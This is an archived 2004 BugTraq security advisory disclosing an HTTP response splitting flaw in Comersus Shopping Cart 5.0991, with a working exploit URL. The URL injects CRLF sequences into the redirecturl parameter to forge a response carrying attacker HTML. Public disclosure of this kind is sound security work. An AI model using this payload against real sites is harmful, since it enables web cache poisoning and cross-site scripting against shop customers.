BugTraq
ADVISORY: http response splitting hole in Comersus shopping cart Sep 01 2004 04:52AM
Maestro De-Seguridad (maestrodeseguridad lycos com)
ADVISORY

Author: Maestro (me!)

Date: 01-SEP-04

Vendor: Comersus (www.comersus.com)

Product: Comersus Shopping Cart 5.0991

Problem: Http response splitting (web cache poisoning, xss,
yadayadayada) -

http://www.packetstormsecurity.org/papers/general/whitepaper_httprespons
e.pdf

Exploit:
http://site/path_to_comersus/comersus_customerLoggedVerify.asp?

redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/ht
ml%0d%0aContent-L

ength:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html}

(replace curly braces with lessthan and greaterthan)

Vendor status: vendor was contacted (attempt) several times over the
last two weeks, by their bug report form, and by emal to support. No
response so far.

--
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default
.asp?SRC=lycos10

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus